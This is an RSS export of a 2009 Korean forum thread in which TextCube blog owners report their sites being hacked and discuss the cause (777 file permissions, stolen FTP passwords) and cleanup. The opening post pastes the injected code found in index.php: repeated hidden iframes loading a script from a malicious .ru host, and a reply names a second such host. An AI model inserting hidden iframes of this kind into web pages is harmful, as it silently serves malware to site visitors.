<![CDATA[TNF : Tatter Network Foundation forum - 지금 버전 텍스트큐브 해킹당함]]> 2009-09-28T17:47:18Z PunBB http://forum.tattersite.com/ko/viewtopic.php?id=8852 <![CDATA[RSS 답글: 지금 버전 텍스트큐브 해킹당함]]> 흐음 보안 안내를 통해 777 퍼미션을 변경하도록 하는 부분을 안내해야겠네요.^^

그런데 파일은 쓰기 권한이 없을텐데 어떤 방법을 썼을까요? 흠... 역으로 한 번 생각을 해 봐야겠네요;

혹시 서버에 indexes 옵션이 켜져 있으면 리스트를 바로 볼 수 있을 것 같기도 하고...

]]> http://forum.tattersite.com/ko/profile.php?id=2 2009-09-28T17:47:18Z http://forum.tattersite.com/ko/viewtopic.php?pid=36654#p36654 <![CDATA[RSS 답글: 지금 버전 텍스트큐브 해킹당함]]> 텍스트큐브에서 블로그 소스 받아서 간편하게 복원하고

FTP 비번 어렵게(특수문자포함) 변경하면됩니다

루트의 index.php 와 플러그인 폴더 덮어쓰기하고

index.gif.php
파일 찾아서....이건 어딨는지 찾느거 귀찮아서 저는 어땟치 폴더 빼고 그냥 덮어쓰기했습니다

아니면

기존의 소스 하드로 복사해서
탐색기에서 index.* 로 검색후 일일이 수정하면되는데
어떤 분은 소스가 변경되었다하니 그냥 덮어쓰기하는게 편할 것 같습니다

실질적으로 FTP 계정으로 들어와서 해킹하는거니

비밀번호 변경하세요  어렵게...........

]]> 2009-09-28T14:39:43Z http://forum.tattersite.com/ko/viewtopic.php?pid=36653#p36653 <![CDATA[RSS 답글: 지금 버전 텍스트큐브 해킹당함]]> 역시 서버를 하나 받는게 속편한듯....

]]> http://forum.tattersite.com/ko/profile.php?id=3398 2009-09-22T05:17:17Z http://forum.tattersite.com/ko/viewtopic.php?pid=36582#p36582 <![CDATA[RSS 답글: 지금 버전 텍스트큐브 해킹당함]]> 저도 오늘 당했습니다
index파일마다 iframe가 들어가면서 파일 내용도 일부 지워졌네요
전 t-age.ru:8080 이런 링크가 들어갔습니다

가비아에 연락해보니 누군가 ftp로 접속했다는데 전부 아이피가 다르다네요
아무래도 해킹툴로 접속되었나봅니다

]]> 2009-09-22T03:59:24Z http://forum.tattersite.com/ko/viewtopic.php?pid=36580#p36580 <![CDATA[RSS 답글: 지금 버전 텍스트큐브 해킹당함]]> 사실상 권한문제로 해킹의 노출이 되는건 사실이지만,
그렇게 쉽게 된다는건 호스팅 업체의 보안 문제가 더 크다고 봅니다.
그렇다면, 텍스트큐브뿐만이 아닌 흔한 xe나 z보드 등의 777의 여견을 쓰는 여타의 웹프로그램 모두 다 그렇겠죠.

]]> http://forum.tattersite.com/ko/profile.php?id=9 2009-09-18T23:23:54Z http://forum.tattersite.com/ko/viewtopic.php?pid=36567#p36567 <![CDATA[지금 버전 텍스트큐브 해킹당함]]> <div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div><div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>

해킹당하면 본문에 이런게 소스가 있고 하얗게 보입니다/

index.php 에 아이프레미으로 위 소스가 하나 삽입됩니다.

http://domain.com
http://domain.com/blog
첫 번째 루트에 설치하면서 퍼미션을 777, 707 로 주면 100%로 해킹 당합니다.
초기 설치시 777로 변경하라고 하기에..
장기적으로 777로 변경하고 다시 변경 안한 곳은 100%로 해킹 당합니다.

2곳에 호스팅 서비스를 받는데/  6시간 안에 같은 방식으로 해킹 당했습니다.

]]> 2009-09-18T14:55:21Z http://forum.tattersite.com/ko/viewtopic.php?pid=36565#p36565